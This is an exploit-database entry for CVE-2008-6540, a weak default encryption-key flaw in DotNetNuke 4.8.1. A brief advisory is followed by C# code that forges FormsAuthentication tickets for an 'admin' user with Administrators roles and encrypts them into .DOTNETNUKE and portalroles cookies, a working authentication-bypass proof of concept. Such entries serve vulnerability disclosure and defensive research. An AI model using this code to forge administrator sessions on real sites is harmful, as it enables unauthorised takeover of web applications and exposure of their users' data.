DotNetNuke 4.8.1 - Default 'ValidationKey' and 'DecriptionKey' Weak Encryption

Author: Brian Holyfield
type: remote
platform: windows
port: 
date_added: 2008-03-21 
date_updated: 2014-02-06 
verified: 1 
codes: CVE-2008-6540;OSVDB-43720 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/28391/info

DotNetNuke is prone to a weak encryption vulnerability.

An attacker can exploit this issue to decrypt sensitive data. Information obtained may lead to further attacks.

This issue affects DotNetNuke 4.8.1; other versions may also be affected.

  // Step 1: Generate the two FormsAuthenticationTickets
      FormsAuthenticationTicket  ticket1 = new FormsAuthenticationTicket("admin", true, 10000);
      FormsAuthenticationTicket ticket2 = new FormsAuthenticationTicket(2, "admin", System.DateTime.Now, System.DateTime.MaxValue, true, "Registered
Users;Subscribers;Administrators");


      // Step 2: Encrypt the FormsAuthenticationTickets
      string cookie1 = ".DOTNETNUKE=" + FormsAuthentication.Encrypt(ticket1);
      string cookie2 = "portalroles=" + FormsAuthentication.Encrypt(ticket2);